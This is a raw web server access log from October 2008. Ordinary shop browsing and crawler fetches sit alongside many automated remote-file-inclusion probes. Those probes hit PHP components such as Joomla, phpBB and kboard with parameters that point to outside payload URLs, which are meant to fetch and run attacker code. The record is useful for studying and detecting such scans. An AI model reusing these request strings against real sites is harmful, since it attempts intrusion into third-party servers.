75.60.97.69 - - [22/Oct/2008:00:22:17 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):chromic%20suture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
75.60.97.69 - - [22/Oct/2008:00:22:17 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):chromic%20suture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
75.60.97.69 - - [22/Oct/2008:00:22:17 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):chromic%20suture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
75.60.97.69 - - [22/Oct/2008:00:22:17 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):chromic%20suture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
75.60.97.69 - - [22/Oct/2008:00:22:17 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):chromic%20suture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
75.60.97.69 - - [22/Oct/2008:00:22:18 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):chromic%20suture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
75.60.97.69 - - [22/Oct/2008:00:22:18 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):chromic%20suture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
75.60.97.69 - - [22/Oct/2008:00:22:18 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
74.6.17.189 - - [22/Oct/2008:00:22:17 -0400] "GET /logs/error_log.Q107111600 HTTP/1.0" 200 110817 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
75.60.97.69 - - [22/Oct/2008:00:22:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LEF8CB4225D578000F86C05A+M37+ENG HTTP/1.1" 200 59048 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):chromic%20suture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
75.60.97.69 - - [22/Oct/2008:00:22:42 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF8CB4225D578000F86C05A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
219.85.63.226 - - [22/Oct/2008:00:22:52 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
219.85.63.226 - - [22/Oct/2008:00:22:52 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
219.85.63.226 - - [22/Oct/2008:00:22:52 -0400] "GET /logs/access_log.Q108092500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
77.79.246.241 - - [22/Oct/2008:00:22:56 -0400] "GET /errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
219.85.63.226 - - [22/Oct/2008:00:22:57 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [22/Oct/2008:00:22:57 -0400] "GET /logs/access_log.Q108092500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [22/Oct/2008:00:22:57 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
201.219.3.77 - - [22/Oct/2008:00:22:58 -0400] "GET /errors.php?error=http://mydn.co.uk/WysiwygPro/editor_files/images/id.txt? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
201.219.3.77 - - [22/Oct/2008:00:22:58 -0400] "GET /logs/errors.php?error=http://mydn.co.uk/WysiwygPro/editor_files/images/id.txt? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
75.60.97.69 - - [22/Oct/2008:00:23:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LEF8CB52B57E7E000054C05A+M37+ENG HTTP/1.1" 200 59098 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF8CB4225D578000F86C05A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
219.85.63.226 - - [22/Oct/2008:00:23:02 -0400] "GET /logs/error_log.Q108101300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
75.60.97.69 - - [22/Oct/2008:00:23:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LEF8CB52D583720001C2C05A+M37+ENG HTTP/1.1" 200 59058 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF8CB52B57E7E000054C05A+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
219.85.63.226 - - [22/Oct/2008:00:23:35 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
219.85.63.226 - - [22/Oct/2008:00:23:35 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
201.33.20.225 - - [22/Oct/2008:00:24:14 -0400] "GET /senetman/html/index.php?page=http://yeonkok.puru.net/img/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.813"
77.74.195.152 - - [22/Oct/2008:00:24:17 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://121.254.140.55/~shinapt//upload/File_Dir/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
219.85.63.226 - - [22/Oct/2008:00:24:24 -0400] "GET /logs/access_log.Q108081900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
87.241.44.46 - - [22/Oct/2008:00:25:01 -0400] "GET /logs/access_log.Q108072600/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.241.44.46 - - [22/Oct/2008:00:25:01 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
87.241.44.46 - - [22/Oct/2008:00:25:01 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
219.85.63.226 - - [22/Oct/2008:00:25:21 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
219.85.63.226 - - [22/Oct/2008:00:25:21 -0400] "GET /logs/access_log.Q108082900//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
219.85.63.226 - - [22/Oct/2008:00:25:22 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
85.119.155.214 - - [22/Oct/2008:00:25:26 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
219.85.63.226 - - [22/Oct/2008:00:25:31 -0400] "GET /logs/error_log.Q108101300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.97.194.235 - - [22/Oct/2008:00:25:32 -0400] "GET /logs/access_log.Q108100400//include/lib.inc.php?site_path=http://www.v2008.kit.net/idfeel.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
201.22.6.28 - - [22/Oct/2008:00:25:41 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [22/Oct/2008:00:25:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.149.125.218 - - [22/Oct/2008:00:26:07 -0400] "GET /logs/access_log.Q108101200/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://30stm.dk/v2/error/copyright.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
219.85.63.226 - - [22/Oct/2008:00:26:25 -0400] "GET /logs/access_log.Q108100400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [22/Oct/2008:00:26:25 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [22/Oct/2008:00:26:25 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [22/Oct/2008:00:26:46 -0400] "GET /logs/access_log.Q108081900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.222.40.78 - - [22/Oct/2008:00:27:11 -0400] "GET /logs/access_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:27:11 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:27:11 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
201.22.6.28 - - [22/Oct/2008:00:27:54 -0400] "GET /logs/access_log.Q108082700/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.222.40.78 - - [22/Oct/2008:00:27:55 -0400] "GET /logs/access_log.Q108092400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
66.172.9.3 - - [22/Oct/2008:00:28:16 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pcpinformatica.com.br/id3.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
66.172.9.3 - - [22/Oct/2008:00:28:16 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pcpinformatica.com.br/id3.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
66.172.9.3 - - [22/Oct/2008:00:28:16 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pcpinformatica.com.br/id3.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
66.172.9.3 - - [22/Oct/2008:00:28:31 -0400] "GET /logs/access_log.Q108081500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pcpinformatica.com.br/id3.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
201.22.6.28 - - [22/Oct/2008:00:28:40 -0400] "GET /logs/access_log.Q108092500/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.22.6.28 - - [22/Oct/2008:00:28:40 -0400] "GET /errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.22.6.28 - - [22/Oct/2008:00:28:40 -0400] "GET /logs/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.22.6.28 - - [22/Oct/2008:00:29:07 -0400] "GET /logs/access_log.Q108082000/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
124.81.96.76 - - [22/Oct/2008:00:29:11 -0400] "GET /logs/access_log.Q108100400/?INCLUDE_FOLDER=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
124.81.96.76 - - [22/Oct/2008:00:29:12 -0400] "GET /?INCLUDE_FOLDER=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
124.81.96.76 - - [22/Oct/2008:00:29:14 -0400] "GET /logs/?INCLUDE_FOLDER=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 200 24059 "-" "libwww-perl/5.79"
77.222.40.78 - - [22/Oct/2008:00:29:26 -0400] "GET /logs/access_log.Q108101600///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:29:27 -0400] "GET ///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:29:27 -0400] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:29:30 -0400] "GET /logs/access_log.Q108101600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:29:30 -0400] "GET /logs/access_log.Q108101600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:29:30 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:29:30 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:29:31 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
77.222.40.78 - - [22/Oct/2008:00:29:31 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://www.perucasas.com/kickoff.jpg? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
77.221.130.17 - - [22/Oct/2008:00:29:39 -0400] "GET /logs/access_log.Q108072600/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
77.221.130.17 - - [22/Oct/2008:00:29:39 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
77.221.130.17 - - [22/Oct/2008:00:29:39 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
209.59.12.99 - - [22/Oct/2008:00:30:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.64.192 - - [22/Oct/2008:00:31:13 -0400] "GET /logs/access_log.Q108072600/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
89.108.64.192 - - [22/Oct/2008:00:31:13 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
89.108.64.192 - - [22/Oct/2008:00:31:13 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
64.22.82.135 - - [22/Oct/2008:00:31:58 -0400] "GET /logs/error_log.Q108061900/index.php?sourcedir=http://2excel.com.au/id4.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
64.22.82.135 - - [22/Oct/2008:00:31:58 -0400] "GET /index.php?sourcedir=http://2excel.com.au/id4.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
64.22.82.135 - - [22/Oct/2008:00:31:58 -0400] "GET /logs/index.php?sourcedir=http://2excel.com.au/id4.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
216.239.0.245 - - [22/Oct/2008:00:32:04 -0400] "GET /logs/access_log.Q108090600%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://playwithyourmind.com/vnc/idv6.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
72.29.68.244 - - [22/Oct/2008:00:32:08 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://freenet.am/~h4ck1nf0/sistem.gif?? HTTP/1.1" 404 226 "-" "libwww-perl/5.810"
64.22.82.135 - - [22/Oct/2008:00:32:20 -0400] "GET /logs/error_log.Q108061900/index.php?sourcedir=http://2excel.com.au/readme1.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
64.22.82.135 - - [22/Oct/2008:00:32:20 -0400] "GET /index.php?sourcedir=http://2excel.com.au/readme1.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
64.22.82.135 - - [22/Oct/2008:00:32:20 -0400] "GET /logs/index.php?sourcedir=http://2excel.com.au/readme1.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
195.5.146.254 - - [22/Oct/2008:00:32:32 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.motorolatools.com.br/idv6.txt%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
195.5.146.254 - - [22/Oct/2008:00:32:32 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.motorolatools.com.br/idv6.txt%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
195.5.146.254 - - [22/Oct/2008:00:32:35 -0400] "GET /logs/access_log.Q108100300//tools/send_reminders.php?noSet=0&includedir=http://www.motorolatools.com.br/idv6.txt%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
202.181.99.47 - - [22/Oct/2008:00:32:37 -0400] "GET /logs/access_log.Q108072600/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.181.99.47 - - [22/Oct/2008:00:32:38 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.181.99.47 - - [22/Oct/2008:00:32:38 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
64.22.82.135 - - [22/Oct/2008:00:33:17 -0400] "GET /logs/access_log.Q108052200/index.php?sourcedir=http://2excel.com.au/readme1.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
64.22.82.135 - - [22/Oct/2008:00:33:18 -0400] "GET /logs/access_log.Q108052200/index.php?sourcedir=http://2excel.com.au/id4.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
216.239.0.245 - - [22/Oct/2008:00:33:20 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://playwithyourmind.com/vnc/idfeel.txt?? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
216.239.0.245 - - [22/Oct/2008:00:33:21 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://playwithyourmind.com/vnc/idfeel.txt?? HTTP/1.1" 404 256 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
216.239.0.245 - - [22/Oct/2008:00:33:21 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://playwithyourmind.com/vnc/idfeel.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
216.239.0.245 - - [22/Oct/2008:00:33:25 -0400] "GET /logs/access_log.Q108081500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://playwithyourmind.com/vnc/idfeel.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
74.6.17.189 - - [22/Oct/2008:00:34:59 -0400] "GET /logs/error_log.Q107070100 HTTP/1.0" 200 35478 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
161.58.192.164 - - [22/Oct/2008:00:35:04 -0400] "GET //components/com_forum/download.php?phpbb_root_path=http://www.fitsquad.ca/components/bot.txt?? HTTP/1.1" 404 232 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
161.58.192.164 - - [22/Oct/2008:00:35:04 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.fitsquad.ca/components/bot.txt?? HTTP/1.1" 404 237 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.3.194.35 - - [22/Oct/2008:00:35:07 -0400] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
195.3.194.35 - - [22/Oct/2008:00:35:07 -0400] "GET /logs/access_log.Q108081900//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
195.3.194.35 - - [22/Oct/2008:00:35:07 -0400] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
74.6.17.189 - - [22/Oct/2008:00:35:04 -0400] "GET /logs/access_log.Q107120800 HTTP/1.0" 200 1022024 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.3.194.35 - - [22/Oct/2008:00:35:43 -0400] "GET /logs/error_log.Q108101400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
85.119.155.214 - - [22/Oct/2008:00:35:45 -0400] "GET /logs/error_log.Q108100200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
209.59.12.99 - - [22/Oct/2008:00:35:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.22.6.28 - - [22/Oct/2008:00:36:26 -0400] "GET /errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
193.136.63.5 - - [22/Oct/2008:00:36:42 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
83.64.132.254 - - [22/Oct/2008:00:36:52 -0400] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://kvs.ikt-servicefag.no/backups/v8.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.76"
83.64.132.254 - - [22/Oct/2008:00:36:52 -0400] "GET /logs/access_log.Q108081300/modules/My_eGallery/public/displayCategory.php?basepath=http://kvs.ikt-servicefag.no/backups/v8.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.76"
